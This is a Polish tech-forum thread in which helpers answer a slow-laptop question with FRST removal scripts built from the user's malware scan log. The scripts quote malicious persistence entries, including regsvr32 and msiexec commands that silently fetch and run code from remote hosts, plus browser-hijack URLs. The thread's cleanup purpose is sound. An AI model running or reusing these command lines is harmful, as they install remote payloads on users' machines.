Elektroda.pl
Elektroda.pl
X
CControls
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Bardzo powolne działanie laptopa

szymon189 23 Lis 2017 17:15 408 8
  • CControls
  • #2 23 Lis 2017 17:29
    atomic99
    Poziom 30  

    Marka / model laptopa ?
    Jaki procesor ?
    Jaka karta graficzna ?
    Jaki dysk ?
    Ile pamięci ?
    System ?

    0
  • #3 23 Lis 2017 17:40
    krzychupar
    Poziom 40  

    Odinstaluj:
    Amazon 1Button App (HKLM-x32\...\{3E69CC95-C0F6-4C74-8F43-74F9046F20B2}) (Version: 1.0.10 - Amazon) <==== UWAGA
    ByteFence Anti-Malware (HKLM-x32\...\ByteFence) (Version: 3.14.0.10 - Byte Technologies LLC) <==== UWAGA
    Lenovo Browser Guard (HKLM-x32\...\LenovoBrowserGuard) (Version: 2.14.2.9 - ClientConnect LTD) <==== UWAGA
    Lenovo Browser Guard (HKLM-x32\...\LenovoBrowserGuard) (Version: 2.14.2.9 - ClientConnect LTD) <==== UWAGA
    McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.161 - McAfee, Inc.)
    YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version: - ELEX DO BRASIL PARTICIPAÇÕES LTDA) <==== UWAGA

    Otwórz notatnik systemowy i wklej:

    CloseProcess:
    HKU\S-1-5-21-3799993751-3803681585-1394063601-1001\...\ChromeHTML: -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.) <==== UWAGA
    ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku
    Task: {0704BE97-7BF1-4AF1-BA42-B97E333DD0C1} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku <==== UWAGA
    Task: {0CC4F829-94E1-4FDE-8ED9-5A0D5B620FEC} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku <==== UWAGA
    Task: {13618227-9095-49D1-A9F4-50EBB3950B74} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku <==== UWAGA
    Task: {33B66603-667A-4012-AAE4-5626F1362B91} - System32\Tasks\McAfee\McAfee Idle Detection Task
    Task: {34EFECEE-C5CB-49F2-8C26-A5CD3999BB30} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe [2017-04-19] (Byte Technologies LLC) <==== UWAGA
    Task: {6D202BDF-11C0-4ABF-8C25-A52DB3FFDFA4} - System32\Tasks\ByteFence Scan => C:\Program Files\ByteFence\ByteFence.exe [2017-04-19] (Byte Technologies LLC) <==== UWAGA
    Task: {858CF753-42D1-40B8-9758-B1D945F3AFEB} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku <==== UWAGA
    Task: {87726C55-595D-4A07-99B3-CAE914FD8712} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> Brak pliku <==== UWAGA
    Task: {8DEF1B95-71D9-40D1-9346-99AE9315465F} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Brak pliku <==== UWAGA
    Task: {8F6E3009-5E68-4EF3-93AA-6950AE5E8141} - System32\Tasks\PowerWord-SCT-JT => regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkPGN8NTHcrAFcMTItMDReMTFyG3MdwXxewjJknAh4nAMdwXxewjJk scrobj.dll <==== UWAGA
    Task: {92DDAA61-4A21-439E-8894-CEC28C1CB1B8} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku <==== UWAGA
    Task: {9450691E-D0C1-47E3-9CA9-C59CB7D17D8F} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku <==== UWAGA




    Task: {99047BB6-18F5-40EA-A364-D1A43E0AC7BD} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku <==== UWAGA
    Task: {9D35ECDA-B970-4746-822C-085124BE83C6} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku <==== UWAGA
    Task: {A072573A-E592-4906-A34F-90070F20B1D7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku <==== UWAGA
    Task: {C8B2ECAC-0881-4E75-A632-28588D58B596} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku <==== UWAGA
    Task: {E9185CFF-1D7B-475C-B3B8-4E0226CB4C40} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== UWAGA
    Task: {F584196A-892E-4925-9B2E-9A667F175D3E} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Brak pliku <==== UWAGA
    Task: {F649E8EF-84BE-4830-91AD-DC4687598CB4} - System32\Tasks\T0528 => "msiexec.exe" /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
    ShortcutWithArgument: C:\Users\Bernadeta\Desktop\Facebook.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.ourluckysites.com/?type=sc&ts=...mp;uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D
    Hosts:
    (Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe
    (Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe
    (McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
    (McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
    (McAfee, Inc.) C:\Windows\System32\mfevtps.exe
    (McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
    (McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\saUI.exe
    (Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe
    (Byte Technologies LLC) C:\Program Files\ByteFence\ByteFence.exe
    HKU\S-1-5-21-3799993751-3803681585-1394063601-1001\...\Run: [background_fault] => C:\Users\Bernadeta\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-06] (AVAST Software) <==== UWAGA
    HKU\S-1-5-21-3799993751-3803681585-1394063601-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkPGN...crAFcMTItMDReMTFyG3MdwXxewjJknAh4nAMdwXxewjJk /q <==== UWAGA
    AppInit_DLLs: C:\PROGRA~2\Amazon\AMAZON~1\AMAZON~2.DLL => C:\Program Files (x86)\Amazon\Amazon1ButtonApp\AmazonExtIE64.dll [119616 2014-09-26] (Amazon Inc.)
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    HKU\S-1-5-21-3799993751-3803681585-1394063601-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D
    HKU\S-1-5-21-3799993751-3803681585-1394063601-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D
    HKU\S-1-5-21-3799993751-3803681585-1394063601-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com
    SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3799993751-3803681585-1394063601-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3799993751-3803681585-1394063601-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?PC=WCUG&FORM=WCUGDF&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3799993751-3803681585-1394063601-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3799993751-3803681585-1394063601-1001 -> {B2BFD2DF-44F2-46F5-879F-FBBFCFF7AB06} URL =
    BHO: McAfee WebAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-09-06] (McAfee, Inc.)
    BHO-x32: McAfee WebAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-09-06] (McAfee, Inc.)
    Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-09-06] (McAfee, Inc.)
    Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-09-06] (McAfee, Inc.)
    Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-09-06] (McAfee, Inc.)
    Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-09-06] (McAfee, Inc.)
    Edge HomeButtonPage: HKU\S-1-5-21-3799993751-3803681585-1394063601-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D
    FF ProfilePath: C:\Users\Bernadeta\AppData\Roaming\Firefox\Firefox\Profiles\rn39ugr3.default [2017-05-15] <==== UWAGA
    FF Homepage: Firefox\Firefox\Profiles\rn39ugr3.default -> hxxp://www.searchinme.com/
    FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
    FF Extension: (McAfee WebAdvisor) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2017-07-20] [Przestarzałe]
    FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
    CHR HomePage: Default -> hxxp://www.msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=pl-pl
    CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1493754431&z=3eb0ff53bbd416154a6a481g6z5tcc4m4w4z9zec5b&from=ypid&uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D"
    CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> ourluckysites
    CHR Extension: (McAfee® WebAdvisor) - C:\Users\Bernadeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2017-03-21]
    CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-05-28]
    CHR HKU\S-1-5-21-3799993751-3803681585-1394063601-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-05-28]
    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
    HKU\S-1-5-21-3799993751-3803681585-1394063601-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.) <==== UWAGA
    R2 3DM; C:\Users\Bernadeta\AppData\Local\3DM\Kitty.dll [754688 2017-04-18] (kitty.exe) [Brak podpisu cyfrowego] <==== UWAGA
    R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-31] (TODO: <公司名>) [Brak podpisu cyfrowego] <==== UWAGA
    S2 ByteFenceService; C:\Program Files\ByteFence\ByteFenceService.exe [145888 2017-07-20] (Byte Technologies LLC)
    S2 CSHMDR; C:\Users\Bernadeta\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
    S2 CWASRE; C:\Users\Bernadeta\AppData\Local\CWASRE\Snare.dll [828416 2017-05-17] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
    R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda) <==== UWAGA
    U2 Kitty; C:\Users\Bernadeta\AppData\Local\Kitty\Kitty.dll [754688 2017-04-17] (kitty.exe) [Brak podpisu cyfrowego] <==== UWAGA
    R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [590880 2017-09-06] (McAfee, Inc.)
    S3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [233680 2015-09-21] (McAfee, Inc.)
    R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [378848 2015-10-21] (McAfee, Inc.)
    S3 mfevtp; C:\WINDOWS\system32\mfevtps.exe [256840 2015-09-21] (McAfee, Inc.)
    R2 SNARE; C:\Users\Bernadeta\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
    S2 terana; C:\Users\Bernadeta\AppData\Local\terana\terana.dll [909312 2017-05-31] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
    R2 WinSAPSvc; C:\Users\Bernadeta\AppData\Roaming\WinSAPSvc\WinSAP.dll [1886720 2017-05-31] () [Brak podpisu cyfrowego] <==== UWAGA
    S2 FirefoxU; "C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe" [X] <==== UWAGA
    S3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [80760 2015-09-23] (McAfee, Inc.)
    R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    S3 iSafeKrnlBoot; C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    R1 iSafeNetFilter; C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== UWAGA
    R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [415976 2015-09-23] (McAfee, Inc.)
    R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [351120 2015-09-23] (McAfee, Inc.)
    S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [82072 2015-09-23] (McAfee, Inc.)
    R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [497888 2015-09-23] (McAfee, Inc.)
    R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [841944 2015-09-23] (McAfee, Inc.)
    R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [111608 2017-02-14] (McAfee, Inc.)
    R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [244544 2015-09-23] (McAfee, Inc.)
    2017-11-22 17:37 - 2015-10-11 12:20 - 000000000 ____D C:\Program Files (x86)\McAfee
    2017-11-23 16:42 - 2017-02-26 11:06 - 000000000 ____D C:\Program Files\ByteFence
    C:\Users\Bernadeta\AppData\Local\background_fault\aswRD.exe
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze, gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • CControls
  • #4 23 Lis 2017 17:51
    Kolobos
    Spec od komputerów

    @atomic99 po co o to pytasz w tym dziale?

    @szymon189
    Odinstaluj:
    Amazon 1Button App
    ByteFence Anti-Malware
    Lenovo Browser Guard
    McAfee WebAdvisor
    YAC(Yet Another Cleaner!)

    Zainfekowane profile przegladarek zostana usuniete, jezeli potrzebne Ci zakladki itp, to zgraj je PRZED wykonaniem skryptu.

    Uzyj AdwCleaner, opcja Scan/Szukaj i Clean/Usun: http://www.bleepingcomputer.com/download/adwcleaner/

    Uzyj http://us.mcafee.com/apps/supporttools/mcpr/mcpr.asp i usun pozostalosci po McAfee.

    Wykonaj Fixlist.txt dla FRST:
    CloseProcesses:
    HKU\S-1-5-21-3799993751-3803681585-1394063601-1001\...\ChromeHTML: -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.) <==== UWAGA
    Task: {0704BE97-7BF1-4AF1-BA42-B97E333DD0C1} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku <==== UWAGA
    Task: {0CC4F829-94E1-4FDE-8ED9-5A0D5B620FEC} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku <==== UWAGA
    Task: {13618227-9095-49D1-A9F4-50EBB3950B74} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku <==== UWAGA
    Task: {33B66603-667A-4012-AAE4-5626F1362B91} - System32\Tasks\McAfee\McAfee Idle Detection Task
    Task: {34EFECEE-C5CB-49F2-8C26-A5CD3999BB30} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe [2017-04-19] (Byte Technologies LLC) <==== UWAGA
    Task: {64F198E2-7509-441F-A761-6B1361D3E9BF} - System32\Tasks\Maxthon Update => C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe [2014-09-11] (Maxthon International ltd.)
    Task: {6D202BDF-11C0-4ABF-8C25-A52DB3FFDFA4} - System32\Tasks\ByteFence Scan => C:\Program Files\ByteFence\ByteFence.exe [2017-04-19] (Byte Technologies LLC) <==== UWAGA
    Task: {858CF753-42D1-40B8-9758-B1D945F3AFEB} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku <==== UWAGA
    Task: {87726C55-595D-4A07-99B3-CAE914FD8712} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> Brak pliku <==== UWAGA
    Task: {8DEF1B95-71D9-40D1-9346-99AE9315465F} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Brak pliku <==== UWAGA
    Task: {8F6E3009-5E68-4EF3-93AA-6950AE5E8141} - System32\Tasks\PowerWord-SCT-JT => regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkPGN8NTHcrAFcMTItMDReMTFyG3MdwXxewjJknAh4nAMdwXxewjJk scrobj.dll <==== UWAGA
    Task: {92DDAA61-4A21-439E-8894-CEC28C1CB1B8} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku <==== UWAGA
    Task: {9450691E-D0C1-47E3-9CA9-C59CB7D17D8F} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku <==== UWAGA
    Task: {99047BB6-18F5-40EA-A364-D1A43E0AC7BD} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku <==== UWAGA
    Task: {9D35ECDA-B970-4746-822C-085124BE83C6} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku <==== UWAGA
    Task: {A072573A-E592-4906-A34F-90070F20B1D7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku <==== UWAGA
    Task: {C21CA858-341B-44A2-BB49-062174F8168C} - System32\Tasks\Opera scheduled Autoupdate 1442219178 => C:\Program Files (x86)\Opera\launcher.exe [2017-11-15] (Opera Software)
    Task: {C8B2ECAC-0881-4E75-A632-28588D58B596} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku <==== UWAGA
    Task: {E9185CFF-1D7B-475C-B3B8-4E0226CB4C40} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== UWAGA
    Task: {F584196A-892E-4925-9B2E-9A667F175D3E} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Brak pliku <==== UWAGA
    Task: {F649E8EF-84BE-4830-91AD-DC4687598CB4} - System32\Tasks\T0528 => "msiexec.exe" /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
    Shortcut: C:\Users\Bernadeta\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Bernadeta\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.)
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.)
    ShortcutWithArgument: C:\Users\Bernadeta\Desktop\Facebook.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.ourluckysites.com/?type=sc&ts=...mp;uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D
    ShortcutWithArgument: C:\Users\Bernadeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=...mp;uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D
    2017-02-26 14:14 - 2017-08-29 19:40 - 000302920 _____ () C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe
    2017-02-26 14:14 - 2017-08-29 19:40 - 000620872 _____ () C:\Program Files\ByteFence\rtop\bin\rtop_bg.exe
    2017-04-28 10:20 - 2016-05-23 03:37 - 000065696 _____ () C:\Program Files (x86)\Elex-tech\YAC\zlib1.dll
    2017-05-02 20:47 - 2017-05-31 08:59 - 001886720 _____ () c:\users\bernadeta\appdata\roaming\winsapsvc\winsap.dll
    2017-04-18 15:35 - 2017-04-18 04:12 - 000107008 _____ () c:\programdata\windows\app\kit\applicationverifier.dll
    2017-04-28 10:20 - 2016-05-23 03:37 - 000179200 _____ () C:\Program Files (x86)\Elex-tech\YAC\libpng.dll
    2017-05-31 16:26 - 2017-05-31 06:14 - 000348160 _____ () C:\Users\Bernadeta\AppData\Local\background_fault\bf.dll
    2017-04-18 15:35 - 2017-03-09 06:31 - 002187096 _____ () C:\Program Files (x86)\Hotben\Application\libglesv2.dll
    2017-04-18 15:35 - 2017-03-09 06:31 - 000086360 _____ () C:\Program Files (x86)\Hotben\Application\libegl.dll
    Hosts:
    (Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe
    (Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe
    (Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
    C:\Program Files (x86)\ScreenShot\
    () C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe
    (McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\saUI.exe
    () C:\Program Files\ByteFence\rtop\bin\rtop_bg.exe
    (Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe
    (© 2015 Microsoft Corporation) C:\Users\Bernadeta\AppData\Local\Microsoft\BingSvc\BingSvc.exe
    (AVAST Software) C:\Users\Bernadeta\AppData\Local\background_fault\aswRD.exe
    (Byte Technologies LLC) C:\Program Files\ByteFence\ByteFence.exe
    (Google Inc.) C:\Program Files (x86)\Hotben\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Hotben\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Hotben\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Hotben\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Hotben\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Hotben\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Hotben\Application\chrome.exe
    C:\Program Files (x86)\Hotben\
    (Google Inc.) C:\Program Files (x86)\Hotben\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Hotben\Application\chrome.exe
    (Google) C:\Users\Bernadeta\AppData\Local\Hotben\User Data\SwReporter\22.124.0\software_reporter_tool.exe
    (Google) C:\Users\Bernadeta\AppData\Local\Hotben\User Data\SwReporter\22.124.0\software_reporter_tool.exe
    HKU\S-1-5-21-3799993751-3803681585-1394063601-1001\...\Run: [BingSvc] => C:\Users\Bernadeta\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-12] (© 2015 Microsoft Corporation)
    HKU\S-1-5-21-3799993751-3803681585-1394063601-1001\...\Run: [background_fault] => C:\Users\Bernadeta\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-06] (AVAST Software) <==== UWAGA
    HKU\S-1-5-21-3799993751-3803681585-1394063601-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkPGN...crAFcMTItMDReMTFyG3MdwXxewjJknAh4nAMdwXxewjJk /q <==== UWAGA
    AppInit_DLLs: C:\PROGRA~2\Amazon\AMAZON~1\AMAZON~2.DLL => C:\Program Files (x86)\Amazon\Amazon1ButtonApp\AmazonExtIE64.dll [119616 2014-09-26] (Amazon Inc.)
